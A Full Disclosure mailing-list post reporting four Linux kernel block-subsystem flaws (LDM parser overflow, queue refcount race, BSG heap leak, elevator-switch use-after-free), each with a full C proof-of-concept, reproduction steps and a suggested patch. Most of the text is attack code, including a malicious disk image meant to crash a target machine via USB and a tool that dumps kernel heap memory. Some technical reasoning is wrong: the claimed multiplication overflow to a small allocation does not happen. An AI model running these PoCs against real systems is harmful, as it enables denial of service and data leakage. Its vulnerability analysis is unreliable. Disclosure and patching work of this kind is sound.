full-disclosure - [FD] Linux Kernel Block Subsystem Vulnerabilities

Open Source and information security mailing list archives

Message-ID: <6jfXhq9Bf9B7Afd6JclOLDM6lIW9Dl_7xMp539a-lEPWV3Pw7Z1Glw0Alg3ziczx27VMjdS60FBXZznR6qvLyD5oMdCuAZ0MH02_NGIEiWc=@proton.me>
Date: Mon, 29 Dec 2025 20:20:00 +0000
From: Agent Spooky's Fun Parade via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Linux Kernel Block Subsystem Vulnerabilities

================================================================================
FULL DISCLOSURE: Linux Kernel Block Subsystem Vulnerabilities
Date: 2025-12-29
Affected: Linux Kernel (all versions with affected code)
================================================================================

================================================================================
[1/4] Integer Overflow in LDM Partition Parser - Heap Overflow
================================================================================

VULNERABILITY SUMMARY
---------------------
Type: Integer Overflow leading to Heap Buffer Overflow
File: block/partitions/ldm.c:1247
Severity: HIGH (7.8 CVSS)
Impact: Local privilege escalation, kernel code execution
Attack Vector: Malicious disk image / USB device

TECHNICAL DETAILS
-----------------
The LDM (Logical Disk Manager) partition parser contains an integer overflow
vulnerability in the VBLK fragment reassembly code. When parsing Windows
dynamic disks, the kernel allocates a buffer using:

    f = kmalloc(sizeof(*f) + size * num, GFP_KERNEL);

Where both 'size' and 'num' are attacker-controlled 16-bit values read from
the disk. When size=0xFFFF and num=0xFFFF, the multiplication overflows:

    0xFFFF * 0xFFFF = 0xFFFE0001 (truncated to 32-bit)
    sizeof(*f) + 0xFFFE0001 = small allocation

The kernel allocates a small buffer but later writes up to 64KB of data into
it, causing a heap buffer overflow.

AFFECTED CODE (block/partitions/ldm.c)
--------------------------------------
Line 1247:
    f = kmalloc(sizeof(*f) + size * num, GFP_KERNEL);

Line 461 (bounds check also vulnerable):
    if ((vm->vblk_size * vm->vblk_offset) > 65536) {

PROOF OF CONCEPT
----------------
/*
 * ldm_overflow_poc.c - LDM Integer Overflow PoC
 * Creates a malicious disk image triggering the overflow
 *
 * Compile: gcc -o ldm_poc ldm_overflow_poc.c
 * Usage: ./ldm_poc output.img && losetup /dev/loop0 output.img
 *
 * WARNING: This WILL crash/corrupt your kernel. Use in VM only.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

/* LDM structures */
#define LDM_MAGIC "PRIVHEAD"
#define VBLK_MAGIC "VBLK"

struct ldm_privhead {
    char magic[8];
    uint32_t version;
    uint64_t disk_id;
    char host_id[64];
    char disk_group_id[64];
    char disk_group_name[32];
    uint32_t logical_disk_start;
    uint32_t logical_disk_size;
    uint32_t config_start;
    uint32_t config_size;
    uint32_t num_tocs;
    uint32_t toc_size;
    uint32_t num_configs;
    uint32_t config_record_size;
    uint32_t num_logs;
    uint32_t log_size;
} __attribute__((packed));

struct ldm_vmdb {
    char magic[4];           /* "VMDB" */
    uint32_t last_seq;
    uint32_t vblk_size;      /* Controlled - use 0xFFFF */
    uint32_t vblk_offset;    /* Controlled - use 0xFFFF */
    uint16_t num_vblks;
    /* ... */
} __attribute__((packed));

struct ldm_vblk_head {
    char magic[4];           /* "VBLK" */
    uint32_t seq;
    uint32_t group;
    uint16_t rec_num;        /* Fragment number */
    uint16_t num_recs;       /* Total fragments - use large value */
    /* ... */
} __attribute__((packed));

void create_malicious_ldm_image(const char *filename) {
    int fd = open(filename, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open");
        exit(1);
    }

    /* Create 2MB sparse image */
    ftruncate(fd, 2 * 1024 * 1024);

    /* Write LDM PRIVHEAD at sector 6 (byte offset 3072) */
    struct ldm_privhead privhead = {0};
    memcpy(privhead.magic, LDM_MAGIC, 8);
    privhead.version = 0x0002000C;  /* Version 2.12 */
    privhead.config_start = 1;
    privhead.config_size = 2048;

    lseek(fd, 6 * 512, SEEK_SET);
    write(fd, &privhead, sizeof(privhead));

    /* Write VMDB with overflow values */
    struct ldm_vmdb vmdb = {0};
    memcpy(vmdb.magic, "VMDB", 4);
    vmdb.vblk_size = 0xFFFF;    /* OVERFLOW VALUE */
    vmdb.vblk_offset = 0xFFFF;  /* OVERFLOW VALUE */
    vmdb.num_vblks = 100;

    lseek(fd, 8 * 512, SEEK_SET);  /* VMDB location */
    write(fd, &vmdb, sizeof(vmdb));

    /* Write VBLK fragments that trigger reassembly overflow */
    struct ldm_vblk_head vblk = {0};
    memcpy(vblk.magic, VBLK_MAGIC, 4);
    vblk.seq = 1;
    vblk.group = 1;
    vblk.rec_num = 0;
    vblk.num_recs = 0xFFFF;  /* Large fragment count */

    /* Write multiple fragments to trigger reassembly */
    for (int i = 0; i < 10; i++) {
        vblk.rec_num = i;
        lseek(fd, (16 + i) * 512, SEEK_SET);
        write(fd, &vblk, sizeof(vblk));

        /* Fill rest of sector with controlled data */
        char payload[512 - sizeof(vblk)];
        memset(payload, 'A', sizeof(payload));
        write(fd, payload, sizeof(payload));
    }

    close(fd);
    printf("[+] Created malicious LDM image: %s\n", filename);
    printf("[!] WARNING: Mounting this image WILL crash the kernel\n");
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <output.img>\n", argv[0]);
        return 1;
    }

    create_malicious_ldm_image(argv[1]);

    printf("\nReproduction steps:\n");
    printf("1. Copy image to target VM\n");
    printf("2. sudo losetup /dev/loop0 %s\n", argv[1]);
    printf("3. sudo partprobe /dev/loop0  # TRIGGERS CRASH\n");
    printf("\nOr:\n");
    printf("1. Write image to USB drive\n");
    printf("2. Plug USB into target machine\n");
    printf("3. Kernel auto-probes partitions -> CRASH\n");

    return 0;
}

REPRODUCTION STEPS
------------------
1. Compile the PoC on any Linux system:
   $ gcc -o ldm_poc ldm_overflow_poc.c

2. Create the malicious image:
   $ ./ldm_poc malicious.img

3. In a VM (DO NOT RUN ON PRODUCTION):
   $ sudo losetup /dev/loop0 malicious.img
   $ sudo partprobe /dev/loop0

4. Kernel will crash with heap corruption

Alternative (USB attack vector):
1. Write malicious.img to USB drive:
   $ sudo dd if=malicious.img of=/dev/sdX bs=1M
2. Plug USB into target machine
3. Kernel crashes during automatic partition probing

IMPACT
------
- Heap buffer overflow with controlled size and data
- Kernel code execution possible via heap spray
- Physical access attack via malicious USB
- No user interaction required (auto-probe)

SUGGESTED FIX
-------------
Replace vulnerable allocation with overflow-safe version:

-   f = kmalloc(sizeof(*f) + size * num, GFP_KERNEL);
+   if (check_mul_overflow(size, num, &alloc_size) ||
+       check_add_overflow(alloc_size, sizeof(*f), &alloc_size)) {
+       ldm_error("VBLK allocation overflow");
+       return false;
+   }
+   f = kmalloc(alloc_size, GFP_KERNEL);

================================================================================
[2/4] Request Queue Reference Counting Race Condition
================================================================================

VULNERABILITY SUMMARY
---------------------
Type: TOCTOU Race Condition / Use-After-Free
File: block/blk-core.c:278-284
Severity: MEDIUM (5.5 CVSS)
Impact: Kernel crash, potential privilege escalation
Attack Vector: Local, requires timing

TECHNICAL DETAILS
-----------------
The blk_get_queue() function has a time-of-check to time-of-use (TOCTOU)
race condition between checking if the queue is dying and incrementing
the reference count:

    bool blk_get_queue(struct request_queue *q)
    {
        if (unlikely(blk_queue_dying(q)))   // CHECK
            return false;
        refcount_inc(&q->refs);             // USE - race window!
        return true;
    }

Between the check and the increment, another CPU can complete queue
teardown, decrement refs to 0, and free the structure. The subsequent
refcount_inc() then operates on freed memory.

AFFECTED CODE (block/blk-core.c)
--------------------------------
Lines 278-284:
    bool blk_get_queue(struct request_queue *q)
    {
        if (unlikely(blk_queue_dying(q)))
            return false;
        refcount_inc(&q->refs);  // Should be refcount_inc_not_zero
        return true;
    }

PROOF OF CONCEPT
----------------
/*
 * blk_queue_race_poc.c - Request Queue Race Condition PoC
 *
 * This PoC demonstrates the TOCTOU race in blk_get_queue().
 * Requires root and a removable block device (USB/loop).
 *
 * Compile: gcc -o queue_race -lpthread blk_queue_race_poc.c
 * Usage: sudo ./queue_race /dev/loop0
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <linux/loop.h>
#include <linux/fs.h>
#include <errno.h>
#include <sched.h>

#define NUM_RACERS 4
#define ITERATIONS 100000

static volatile int race_running = 1;
static char *loop_device;
static char *backing_file;

/* Thread that repeatedly opens the block device */
void *opener_thread(void *arg) {
    int cpu = (int)(long)arg;
    cpu_set_t cpuset;

    CPU_ZERO(&cpuset);
    CPU_SET(cpu % 4, &cpuset);
    pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);

    while (race_running) {
        int fd = open(loop_device, O_RDONLY | O_NONBLOCK);
        if (fd >= 0) {
            /* Perform I/O to exercise queue paths */
            char buf[512];
            read(fd, buf, sizeof(buf));
            close(fd);
        }
        /* Tight loop to maximize race window hits */
    }
    return NULL;
}

/* Thread that repeatedly detaches/attaches loop device */
void *detacher_thread(void *arg) {
    int loop_ctl_fd = open("/dev/loop-control", O_RDWR);
    int backing_fd = -1;

    while (race_running) {
        /* Get a free loop device number */
        int loop_fd = open(loop_device, O_RDWR);
        if (loop_fd >= 0) {
            /* Detach - triggers queue dying state */
            ioctl(loop_fd, LOOP_CLR_FD, 0);
            close(loop_fd);
        }

        usleep(100);  /* Small delay */

        /* Reattach */
        loop_fd = open(loop_device, O_RDWR);
        backing_fd = open(backing_file, O_RDWR);
        if (loop_fd >= 0 && backing_fd >= 0) {
            ioctl(loop_fd, LOOP_SET_FD, backing_fd);
            close(backing_fd);
            close(loop_fd);
        }

        usleep(100);
    }

    close(loop_ctl_fd);
    return NULL;
}

/* Thread that submits I/O to exercise blk_get_queue paths */
void *io_submitter_thread(void *arg) {
    while (race_running) {
        int fd = open(loop_device, O_RDONLY | O_DIRECT | O_NONBLOCK);
        if (fd >= 0) {
            void *buf;
            posix_memalign(&buf, 512, 4096);

            /* Submit I/O - internally calls blk_get_queue */
            pread(fd, buf, 4096, 0);

            free(buf);
            close(fd);
        }
    }
    return NULL;
}

int main(int argc, char **argv) {
    pthread_t openers[NUM_RACERS];
    pthread_t submitters[NUM_RACERS];
    pthread_t detacher;

    if (argc != 3) {
        fprintf(stderr, "Usage: %s <loop_device> <backing_file>\n", argv[0]);
        fprintf(stderr, "Example: %s /dev/loop0 /tmp/test.img\n", argv[0]);
        return 1;
    }

    loop_device = argv[1];
    backing_file = argv[2];

    /* Create backing file if needed */
    int bf = open(backing_file, O_RDWR | O_CREAT, 0644);
    if (bf >= 0) {
        ftruncate(bf, 10 * 1024 * 1024);  /* 10MB */
        close(bf);
    }

    /* Initial loop setup */
    int loop_fd = open(loop_device, O_RDWR);
    int back_fd = open(backing_file, O_RDWR);
    if (loop_fd >= 0 && back_fd >= 0) {
        ioctl(loop_fd, LOOP_SET_FD, back_fd);
        close(back_fd);
        close(loop_fd);
    }

    printf("[*] Starting race condition PoC\n");
    printf("[*] Target: %s\n", loop_device);
    printf("[*] This may take a while or crash the kernel...\n");

    /* Start racer threads */
    for (int i = 0; i < NUM_RACERS; i++) {
        pthread_create(&openers[i], NULL, opener_thread, (void*)(long)i);
        pthread_create(&submitters[i], NULL, io_submitter_thread, (void*)(long)i);
    }
    pthread_create(&detacher, NULL, detacher_thread, NULL);

    /* Run for a while */
    sleep(60);

    printf("[*] Stopping threads...\n");
    race_running = 0;

    for (int i = 0; i < NUM_RACERS; i++) {
        pthread_join(openers[i], NULL);
        pthread_join(submitters[i], NULL);
    }
    pthread_join(detacher, NULL);

    printf("[*] If you see this, race was not triggered\n");
    printf("[*] Try running longer or on a system with more CPUs\n");

    return 0;
}

REPRODUCTION STEPS
------------------
1. Create a test environment (use a VM!):
   $ dd if=/dev/zero of=/tmp/test.img bs=1M count=10
   $ sudo losetup /dev/loop0 /tmp/test.img

2. Compile the PoC:
   $ gcc -o queue_race -lpthread blk_queue_race_poc.c

3. Run with root privileges:
   $ sudo ./queue_race /dev/loop0 /tmp/test.img

4. Monitor dmesg for crashes:
   $ dmesg -w

Expected outcomes:
- Kernel OOPS/panic with refcount underflow warning
- Use-after-free detected by KASAN (if enabled)
- System hang

SUGGESTED FIX
-------------
Use atomic check-and-increment:

-   if (unlikely(blk_queue_dying(q)))
-       return false;
-   refcount_inc(&q->refs);
-   return true;
+   if (unlikely(blk_queue_dying(q)))
+       return false;
+   return refcount_inc_not_zero(&q->refs);

================================================================================
[3/4] CVE-PENDING: BSG Response Length Information Leak
================================================================================

VULNERABILITY SUMMARY
---------------------
Type: Kernel Heap Information Disclosure
File: block/bsg-lib.c:118
Severity: MEDIUM (5.5 CVSS)
Impact: Leak of kernel heap memory to userspace
Attack Vector: Local, requires CAP_SYS_RAWIO

TECHNICAL DETAILS
-----------------
The BSG (Block SCSI Generic) transport layer allocates a fixed 96-byte
buffer for job->reply (SCSI_SENSE_BUFFERSIZE), but several drivers set
job->reply_len to values exceeding this allocation. When copy_to_user()
is called, it reads beyond the buffer, leaking kernel heap contents.

    // bsg-lib.c:306 - Fixed allocation
    job->reply = kzalloc(SCSI_SENSE_BUFFERSIZE, GFP_KERNEL);  // 96 bytes

    // bsg-lib.c:116-118 - No bounds check
    int len = min(hdr->max_response_len, job->reply_len);
    copy_to_user(uptr64(hdr->response), job->reply, len);  // Reads beyond!

Drivers that set reply_len > 96:
- bfad_bsg.c:3188: job->reply_len = job->reply_payload.payload_len;
- bfad_bsg.c:3534: job->reply_len = drv_fcxp->rsp_len;
- ql4_bsg.c:493:   reply_len = sizeof(struct iscsi_bsg_reply) + sizeof(mbox_sts);

PROOF OF CONCEPT
----------------
/*
 * bsg_infoleak_poc.c - BSG Information Leak PoC
 *
 * Demonstrates leaking kernel heap memory via BSG interface.
 * Requires CAP_SYS_RAWIO and a BSG-capable device (FC HBA, SAS, etc.)
 *
 * Compile: gcc -o bsg_leak bsg_infoleak_poc.c
 * Usage: sudo ./bsg_leak /dev/bsg/X
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdint.h>
#include <linux/bsg.h>

#define SCSI_SENSE_BUFFERSIZE 96
#define LEAK_SIZE 4096  /* Request more than allocated */

/* BSG protocol constants */
#define BSG_PROTOCOL_SCSI 0
#define BSG_SUB_PROTOCOL_SCSI_TRANSPORT 2

struct fc_bsg_request {
    uint32_t msgcode;
    /* FC-specific fields follow */
} __attribute__((packed));

void hexdump(const void *data, size_t size) {
    const uint8_t *bytes = data;
    for (size_t i = 0; i < size; i += 16) {
        printf("%04zx: ", i);
        for (size_t j = 0; j < 16 && i + j < size; j++) {
            printf("%02x ", bytes[i + j]);
        }
        printf(" |");
        for (size_t j = 0; j < 16 && i + j < size; j++) {
            char c = bytes[i + j];
            printf("%c", (c >= 32 && c < 127) ? c : '.');
        }
        printf("|\n");
    }
}

int attempt_leak(int fd) {
    struct sg_io_v4 hdr = {0};
    struct fc_bsg_request request = {0};
    uint8_t response[LEAK_SIZE] = {0};
    uint8_t sense[SCSI_SENSE_BUFFERSIZE] = {0};

    /* Prepare BSG request */
    hdr.guard = 'Q';
    hdr.protocol = BSG_PROTOCOL_SCSI;
    hdr.subprotocol = BSG_SUB_PROTOCOL_SCSI_TRANSPORT;

    /* Request buffer */
    request.msgcode = 0x80000001;  /* FC_BSG_HST_VENDOR - triggers bfad path */
    hdr.request = (uint64_t)&request;
    hdr.request_len = sizeof(request);

    /* Response buffer - request MORE than SCSI_SENSE_BUFFERSIZE */
    hdr.response = (uint64_t)response;
    hdr.max_response_len = LEAK_SIZE;  /* Key: request 4096, only 96 allocated */

    /* Data-in buffer - large size influences reply_len in some drivers */
    uint8_t din_buf[LEAK_SIZE];
    hdr.din_xferp = (uint64_t)din_buf;
    hdr.din_xfer_len = LEAK_SIZE;

    hdr.timeout = 5000;  /* 5 seconds */

    /* Issue the ioctl */
    int ret = ioctl(fd, SG_IO, &hdr);

    if (ret < 0) {
        perror("ioctl SG_IO");
        return -1;
    }

    printf("[*] Response length returned: %u\n", hdr.response_len);

    if (hdr.response_len > SCSI_SENSE_BUFFERSIZE) {
        printf("[!] VULNERABILITY CONFIRMED!\n");
        printf("[!] Received %u bytes, but buffer is only %d bytes\n",
               hdr.response_len, SCSI_SENSE_BUFFERSIZE);
        printf("[!] Leaked %u bytes of kernel heap:\n",
               hdr.response_len - SCSI_SENSE_BUFFERSIZE);

        printf("\n=== Legitimate response (first 96 bytes) ===\n");
        hexdump(response, SCSI_SENSE_BUFFERSIZE);

        printf("\n=== LEAKED KERNEL HEAP DATA ===\n");
        hexdump(response + SCSI_SENSE_BUFFERSIZE,
                hdr.response_len - SCSI_SENSE_BUFFERSIZE);

        return 1;  /* Leak successful */
    }

    printf("[*] No leak detected (response_len=%u <= %d)\n",
           hdr.response_len, SCSI_SENSE_BUFFERSIZE);
    return 0;
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <bsg_device>\n", argv[0]);
        fprintf(stderr, "Example: %s /dev/bsg/0:0:0:0\n", argv[0]);
        fprintf(stderr, "\nFind BSG devices: ls -la /dev/bsg/\n");
        return 1;
    }

    int fd = open(argv[1], O_RDWR);
    if (fd < 0) {
        perror("open");
        fprintf(stderr, "Note: Requires CAP_SYS_RAWIO (root)\n");
        return 1;
    }

    printf("[*] BSG Information Leak PoC\n");
    printf("[*] Target device: %s\n", argv[1]);
    printf("[*] Attempting to leak kernel heap memory...\n\n");

    /* Try multiple times - driver behavior may vary */
    for (int i = 0; i < 5; i++) {
        printf("=== Attempt %d ===\n", i + 1);
        if (attempt_leak(fd) > 0) {
            printf("\n[+] Successfully leaked kernel heap data!\n");
            break;
        }
        usleep(100000);
    }

    close(fd);
    return 0;
}

REPRODUCTION STEPS
------------------
1. Identify BSG devices on the system:
   $ ls -la /dev/bsg/

   Note: Requires FC HBA, SAS controller, or similar hardware.
   For testing, some USB-SCSI adapters expose BSG interfaces.

2. Compile the PoC:
   $ gcc -o bsg_leak bsg_infoleak_poc.c

3. Run as root:
   $ sudo ./bsg_leak /dev/bsg/0:0:0:0

4. If vulnerable driver is present, observe leaked heap data beyond
   the 96-byte boundary.

SUGGESTED FIX
-------------
Add bounds check before copy_to_user in bsg-lib.c:

    if (job->reply_len && hdr->response) {
-       int len = min(hdr->max_response_len, job->reply_len);
+       int len = min_t(unsigned int, hdr->max_response_len,
+                       min(job->reply_len, SCSI_SENSE_BUFFERSIZE));
        if (copy_to_user(uptr64(hdr->response), job->reply, len))

================================================================================
[4/4] I/O Scheduler Switching Use-After-Free Race
================================================================================

VULNERABILITY SUMMARY
---------------------
Type: Use-After-Free Race Condition
File: block/elevator.c:677-684
Severity: MEDIUM (6.4 CVSS)
Impact: Kernel crash, potential privilege escalation
Attack Vector: Local, requires root, concurrent sysfs writes

TECHNICAL DETAILS
-----------------
The elevator_change() function has insufficient lock coverage. The
elevator_lock mutex only protects elevator_switch() but not the
subsequent elevator_change_done() call. Since elv_iosched_store()
uses a read lock (allowing concurrent access), two simultaneous
elevator switches can race:

    // elevator.c:677-684
    blk_mq_cancel_work_sync(q);
    mutex_lock(&q->elevator_lock);                    // LOCK
    if (!(q->elevator && elevator_match(...)))
        ret = elevator_switch(q, ctx);               // Sets ctx->old, ctx->new
    mutex_unlock(&q->elevator_lock);                  // UNLOCK
    blk_mq_unfreeze_queue(q, memflags);
    if (!ret)
        ret = elevator_change_done(q, ctx);          // OUTSIDE LOCK - UAF!

Race scenario:
1. Thread A: mq-deadline -> bfq (ctx_A->new = bfq)
2. Thread B: bfq -> kyber (ctx_B->old = bfq, same object!)
3. Thread B frees bfq via kobject_put()
4. Thread A accesses freed bfq in elevator_change_done()

PROOF OF CONCEPT
----------------
/*
 * elevator_uaf_poc.c - Elevator Switching UAF Race PoC
 *
 * Triggers use-after-free by racing elevator switches via sysfs.
 * Requires root access.
 *
 * Compile: gcc -o elv_uaf -lpthread elevator_uaf_poc.c
 * Usage: sudo ./elv_uaf /dev/sda
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <sys/stat.h>

#define NUM_THREADS 8
#define ITERATIONS 100000

static volatile int running = 1;
static char sysfs_path[256];
static const char *schedulers[] = {"mq-deadline", "bfq", "kyber", "none"};
static int num_schedulers = 4;

void *racer_thread(void *arg) {
    int thread_id = (int)(long)arg;
    cpu_set_t cpuset;
    char buf[64];

    /* Pin to specific CPU for maximum contention */
    CPU_ZERO(&cpuset);
    CPU_SET(thread_id % 4, &cpuset);
    pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);

    while (running) {
        /* Rapidly switch between schedulers */
        for (int i = 0; i < num_schedulers && running; i++) {
            int fd = open(sysfs_path, O_WRONLY);
            if (fd >= 0) {
                /* Write scheduler name - triggers elevator_change() */
                int idx = (thread_id + i) % num_schedulers;
                write(fd, schedulers[idx], strlen(schedulers[idx]));
                close(fd);
            }
            /* No delay - maximize race window */
        }
    }

    return NULL;
}

/* Thread that reads current scheduler to add memory pressure */
void *reader_thread(void *arg) {
    char buf[256];

    while (running) {
        int fd = open(sysfs_path, O_RDONLY);
        if (fd >= 0) {
            read(fd, buf, sizeof(buf));
            close(fd);
        }
    }

    return NULL;
}

int check_available_schedulers(const char *device) {
    char path[256];
    char buf[256];

    snprintf(path, sizeof(path), "/sys/block/%s/queue/scheduler", device);

    int fd = open(path, O_RDONLY);
    if (fd < 0) {
        return -1;
    }

    int n = read(fd, buf, sizeof(buf) - 1);
    close(fd);

    if (n > 0) {
        buf[n] = '\0';
        printf("[*] Available schedulers: %s", buf);
    }

    return 0;
}

int main(int argc, char **argv) {
    pthread_t threads[NUM_THREADS];
    pthread_t readers[NUM_THREADS / 2];
    const char *device;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <block_device>\n", argv[0]);
        fprintf(stderr, "Example: %s sda\n", argv[0]);
        fprintf(stderr, "         %s loop0\n", argv[0]);
        return 1;
    }

    /* Remove /dev/ prefix if present */
    device = argv[1];
    if (strncmp(device, "/dev/", 5) == 0) {
        device += 5;
    }

    snprintf(sysfs_path, sizeof(sysfs_path),
             "/sys/block/%s/queue/scheduler", device);

    /* Verify path exists */
    if (access(sysfs_path, W_OK) != 0) {
        perror("Cannot access scheduler sysfs");
        fprintf(stderr, "Path: %s\n", sysfs_path);
        fprintf(stderr, "Requires root privileges\n");
        return 1;
    }

    printf("[*] Elevator UAF Race Condition PoC\n");
    printf("[*] Target: %s\n", sysfs_path);

    if (check_available_schedulers(device) < 0) {
        fprintf(stderr, "Cannot read available schedulers\n");
        return 1;
    }

    printf("[*] Starting %d racer threads...\n", NUM_THREADS);
    printf("[!] WARNING: This may crash the kernel!\n");
    printf("[*] Monitor dmesg for UAF/KASAN reports\n\n");

    /* Start racer threads */
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_create(&threads[i], NULL, racer_thread, (void*)(long)i);
    }

    /* Start reader threads for additional pressure */
    for (int i = 0; i < NUM_THREADS / 2; i++) {
        pthread_create(&readers[i], NULL, reader_thread, (void*)(long)i);
    }

    /* Run for specified duration */
    printf("[*] Racing for 30 seconds...\n");
    sleep(30);

    printf("[*] Stopping threads...\n");
    running = 0;

    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }
    for (int i = 0; i < NUM_THREADS / 2; i++) {
        pthread_join(readers[i], NULL);
    }

    printf("[*] Test completed\n");
    printf("[*] Check dmesg for any warnings/crashes\n");

    return 0;
}

REPRODUCTION STEPS
------------------
1. Ensure multiple I/O schedulers are available:
   $ cat /sys/block/sda/queue/scheduler
   [mq-deadline] kyber bfq none

2. Load additional schedulers if needed:
   $ sudo modprobe bfq
   $ sudo modprobe kyber-iosched

3. Compile the PoC:
   $ gcc -o elv_uaf -lpthread elevator_uaf_poc.c

4. Run as root (in a VM!):
   $ sudo ./elv_uaf sda

5. In another terminal, monitor for crashes:
   $ dmesg -w | grep -i "uaf\|kasan\|bug\|rcu"

6. With KASAN enabled kernel, expect output like:
   BUG: KASAN: use-after-free in elv_register_queue+0x...

SUGGESTED FIX
-------------
Option 1: Extend lock coverage to include elevator_change_done():

    mutex_lock(&q->elevator_lock);
    if (!(q->elevator && elevator_match(q->elevator->type, ctx->name)))
        ret = elevator_switch(q, ctx);
+   if (!ret)
+       ret = elevator_change_done(q, ctx);
    mutex_unlock(&q->elevator_lock);
    blk_mq_unfreeze_queue(q, memflags);
-   if (!ret)
-       ret = elevator_change_done(q, ctx);

Option 2: Use write lock instead of read lock in elv_iosched_store():

-   down_read(&set->update_nr_hwq_lock);
+   down_write(&set->update_nr_hwq_lock);

================================================================================
TIMELINE
================================================================================
2025-12-29: Vulnerabilities discovered
2025-12-29: Vulnerabilities confirmed
2025-12-29: Vulnerabilities disclosed

================================================================================
CREDITS
================================================================================
Discovered by: Agent Spooky's Fun Parade
================================================================================
================================================================================
================================================================================

Download attachment "agent-spooky-fun-parade.png" of type "image/png" (1763161 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives